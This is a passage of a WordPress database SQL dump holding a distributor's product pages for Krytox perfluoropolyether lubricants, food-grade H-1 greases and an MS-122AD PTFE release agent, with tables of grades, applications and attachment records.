width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"> XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-10 12:19:24', '2016-10-10 12:19:24', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2440, 2, '2016-11-10 15:34:29', '2016-11-10 15:34:29', '<h1>Krytox FPG 028</h1>\nKrytox™ FPG 028 is a smooth, buttery, perfluoropolyether (PFPE)-based white grease thickened with a special, high-performance polytetrafluoroethylene (PTFE) thickener. It was developed to operate over a wide temperature range (–73 to 204 °C; –99 to 399 °F)) and to be resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. Krytox™ FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The Department of Defense’s Defense Logistics Agency (DLA) has assigned Commercial and Government Entity (CAGE) Code 7GFT8 to The Chemours Company.\n\n<strong>Storage and Handling</strong>\n\nDoes not oxidize or degrade from atmospheric contact. Life of uncontaminated product in reclosed container is undiminished. Indefinite shelf life in unopened container. It is normal for oil to separate from grease during storage. Before use, knead tubes or stir larger containers to remix.\n\n<strong>Product Package</strong>\n\nKrytox FPG 028 is available in 50 and 100 g syringes, 8 oz tubes, and 1.76 lb cartridges.\n\n<a href="https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/">Learn more here.</a>', 'FPG 028', 'Krytox FPG 028 is a smooth, buttery white grease. It has been specifically developed to operate over a wide temperature service range, –73 to 204 °C (–99 to 399 °F), to be resistant to hydrocarbon fuel and liquid oxygen, and to be used as a lubricant in aircraft, aerospace vehicles, and supporting equipment.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '984-autosave-v1', '', '', '2016-11-10 15:34:29', '2016-11-10 15:34:29', '', 984, 'https://www.miller-stephenson.com/984-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2441, 2, '2017-08-21 19:26:10', '2017-08-21 19:26:10', 'Krytox FPG 182 \nKrytox FPG 182 has exceptional performance as shown by its bearing life test that has over 7 times the life of similar products. It is a perfluoropolyether (PFPE)-based grease thickened with a special high-performance PTFE thickener and has exceptional chemical and oxygen resistance. It is designed to operate under severe conditions and can be used for bearings, gears, and as a lubricant for O-rings and elastomers.\n\n<strong>Storage and Handling</strong>\nShelf life: Indefinite shelf life in an unopened container. It is normal for oil to separate from grease during storage. Before use, knead tubes or stir larger containers to remix.\n\n<strong>Product Package</strong>\nKrytox FPG 182 is available in 50 and 100 g syringes, 8 oz tubes, and 1.76 lb cartridges.', 'FPG 182', 'Krytox FPG 182 is a smooth, buttery white grease. It has been specifically developed to operate over a wide temperature service range and in extreme chemical and vacuum conditions. It has exceptional performance as shown by its bearing life test that has over 7 times the life of similar products. \n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\n', 'inherit', 'closed', 'closed', '', '973-autosave-v1', '', '', '2017-08-21 19:26:10', '2017-08-21 19:26:10', '', 973, 'https://www.miller-stephenson.com/973-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2442, 2, '2016-10-10 14:43:39', '2016-10-10 14:43:39', '<h1><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong></h1>\r\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox™ food grade lubricants from Miller-Stephenson.\r\n\r\nAs with the full line of Krytox™ lubricants, Krytox™ oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\r\n\r\nThe composition of Krytox™ lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox™ food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\r\n\r\nKrytox™ lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox™ oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\r\n<h2>Stability and Compatibility</h2>\r\nKrytox™ oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\r\ndown in the presence of most chemicals.\r\n\r\nBecause Krytox™ food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox™ lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox™ lubricants will not break down under extreme pressure or high mechanical stress.\r\n\r\nVarious grades of Krytox™ food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\r\n\r\nUse Krytox™ lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\r\n<h2>Safety and Environmental Protection</h2>\r\nUsing Krytox™ greases and oils:\r\n<ul>\r\n 	<li>Reduces the need for hydrocarbon lubricants</li>\r\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\r\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\r\n</ul>\r\nKrytox™ greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\r\n\r\n<img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\r\n<h2>Benefits in Use</h2>\r\nThe extended life you will see with Krytox™ lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox™ lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox™ lubricants. In addition, because Krytox™ lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\r\n\r\nThe combination of all of these factors translates to long-term cost savings for your business.\r\n\r\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\r\n<h2>Applications for Krytox™ H-1 Food Grade Lubricants</h2>\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Type</strong></td>\r\n<td width="206"><strong>Products</strong></td>\r\n<td width="206"><strong>Application</strong></td>\r\n<td width="206"><strong>Comments</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox™ GPL 202</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox™ GPL 203</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox™ GPL 206</a></td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox™ GPL 223</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox™ GPL 226</a>\r\nKrytox™ FG 34</td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox™ XHT-SX</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT-AC</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox™ XHT-ACX</a></td>\r\n<td>Bearings and chains</td>\r\n<td>Krytox™ XHT-AC and ACX contain corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Lubricating Oils</td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a>\r\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox™ XHT-500</a>\r\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox™ XP-1A5</a>\r\nKrytox™ FG 40</td>\r\n<td>Chains, compressors, bearings, gear boxes</td>\r\n<td>Krytox™ XHT-500 is formulated for high temperatures; Krytox™ XP-1A5 contains corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox™ 1506</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ 1514</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox™ 1525</a></td>\r\n<td>Mechanical pumps</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[ux_product_categories ids="46,115,38" number="10"]', 'Krytox H-1 Food Grade Lubricants', '', 'publish', 'closed', 'closed', '', 'krytox-h-1-food-grade-lubricants', '', '', '2016-10-12 19:50:27', '2016-10-12 19:50:27', '', 0, 'https://www.miller-stephenson.com/?p=2442', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2443, 2, '2016-10-10 13:42:43', '2016-10-10 13:42:43', '', 'krytox-hydrocarbon', '', 'inherit', 'closed', 'closed', '', 'krytox-hydrocarbon', '', '', '2016-10-10 13:42:43', '2016-10-10 13:42:43', '', 2442, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2444, 2, '2016-10-10 13:44:36', '2016-10-10 13:44:36', '', 'krytox-comparison', '', 'inherit', 'closed', 'closed', '', 'krytox-comparison', '', '', '2016-10-10 13:44:36', '2016-10-10 13:44:36', '', 2442, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2445, 2, '2016-10-10 14:08:51', '2016-10-10 14:08:51', '', 'Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', 'shutterstock_174927275', '', '', '2016-10-10 14:09:05', '2016-10-10 14:09:05', '', 2442, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_174927275.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2446, 3, '2017-06-05 12:21:45', '2017-06-05 12:21:45', '<h2>MS-122AD | Dry Film PTFE release agent</h2>\n<h3>Excellent Release Properties; Unmatched Dry Lubricant; Economical</h3>\nMS-122AD was developed as an efficient, economical and universal dry film PTFE release agent / dry lubricant. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications.  A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122AD offers the following benefits:\n<ul>\n 	<li>Cost-effective release of molded parts</li>\n 	<li>Outstanding lubricity and minimization of slip-stick</li>\n 	<li>Nonflammable, Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson has been developing PTFE release agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. </span>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Production engineers will typically choose Dry film PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span></p>\n<p style="font-variant-ligatures: normal; font-variant-caps: normal; orphans: 2; text-align: start; widows: 2; -webkit-text-stroke-width: 0px; word-spacing: 0px;"><span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">Miller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  All variants of the MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the product selection guide below to help direct you to the appropriate product.</span></p>\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>\n\n&nbsp;', 'MS-122AD | Dry Film PTFE release agent', 'MS-122AD was developed as an efficient, economical and universal release agent and dry lubricant. This formulation contains a high lubricity, low molecular weight PTFE fluoropolymer specialized for mold release and dry lubricant applications.  A nonflammable, non-ozone depleting carrier solvent / propellant mixture ensures all environmental regulations are met. MS-122AD offers the following benefits:\n<ul>\n 	<li><strong>As a Release Agent: </strong>Highly effective when applied to rubber molds. Provides a very uniform, thin coating, ideal for routine mold release operations.</li>\n 	<li><strong>As a Dry Lubricant: </strong>Our best dry lubricant, for all applications; may be used on all surfaces, especially where there is metal on metal contact. Provides elimination of "slip-stick" and low coefficient of friction.</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1677-autosave-v1', '', '', '2017-06-05 12:21:45', '2017-06-05 12:21:45', '', 1677, 'https://www.miller-stephenson.com/1677-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2447, 2, '2016-10-10 14:43:39', '2016-10-10 14:43:39', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong>\r\n\r\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox food grade lubricants from Miller-Stephenson.\r\n\r\nAs with the full line of Krytox lubricants, Krytox oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore,\r\nmaintenance costs can be significantly reduced.\r\n\r\nThe composition of Krytox lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\r\n\r\nKrytox lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\r\n\r\n<strong>Stability and Compatibility</strong>\r\nKrytox oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\r\ndown in the presence of most chemicals.\r\n\r\nBecause Krytox food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox lubricants will not break down under extreme pressure or high mechanical stress.\r\n\r\nVarious grades of Krytox food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\r\n\r\nUse Krytox lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\r\n\r\n<strong>Safety and Environmental Protection</strong>\r\n\r\nUsing Krytox greases and oils:\r\n<ul>\r\n 	<li>Reduces the need for hydrocarbon lubricants</li>\r\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\r\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\r\n</ul>\r\nKrytox greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\r\n\r\n<img class="alignnone  wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\r\n\r\n<strong>Benefits in Use</strong>\r\n\r\nThe extended life you will see with Krytox lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox lubricants. In addition, because Krytox lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\r\n\r\nThe combination of all of these factors translates to long-term cost savings for your business.\r\n\r\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\r\n\r\n<strong>Applications for Krytox H-1 Food Grade Lubricants</strong>\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Type</strong></td>\r\n<td width="206"><strong>Products</strong></td>\r\n<td width="206"><strong>Application</strong></td>\r\n<td width="206"><strong>Comments</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox GPL 202</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox GPL 203</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox GPL 205</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox GPL 206</a></td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox GPL 223</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox GPL 225</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox GPL 226</a>\r\nKrytox FG 34</td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox XHT-SX</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox XHT-AC</a>\r\n<a 